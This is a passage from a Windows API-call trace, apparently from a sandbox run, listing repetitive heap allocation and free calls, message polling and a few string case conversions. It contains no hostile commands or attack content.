dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0198.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0198.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0198.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0198.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0198.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0198.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0198.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0198.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0198.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0198.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0198.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0198.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0198.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0198.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0198.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0198.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0198.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0198.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0198.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0198.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0198.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0198.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0198.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0198.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0198.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0198.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0198.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0198.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0198.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0198.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0198.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0198.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0198.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0198.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0198.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0198.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0198.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0198.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0198.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0198.532] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0198.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0198.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0198.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0198.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0198.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0198.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0198.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0198.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0198.533] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0198.533] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0198.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0198.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0198.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0198.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0198.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.534] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0198.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0198.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0198.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0198.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0198.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0198.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0198.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0198.534] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0198.535] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0198.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0198.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0198.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0198.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0198.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0198.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0198.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0198.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa188 [0198.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0198.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0c8 [0198.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0198.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0198.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0198.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cc0 [0198.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa260 [0198.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa170 [0198.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0198.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9df8 [0198.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0198.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0198.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aaec0 [0198.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0198.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d80 [0198.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f18 [0198.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0198.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0198.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9de0 [0198.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa098 [0198.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0198.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0198.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0198.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0198.537] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0198.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0198.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0198.537] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0198.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0198.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0198.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0198.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0198.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0198.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.537] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0198.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0198.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0198.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0198.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0198.538] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0198.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0198.538] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0198.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0198.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0198.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0198.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0198.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0198.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0198.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0198.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0198.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0198.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0198.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0198.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0198.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0198.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0198.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0198.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0198.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0198.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0198.540] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0198.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0198.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0198.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0198.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0198.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0198.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0198.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0198.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0198.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0198.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0198.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0198.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0198.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: 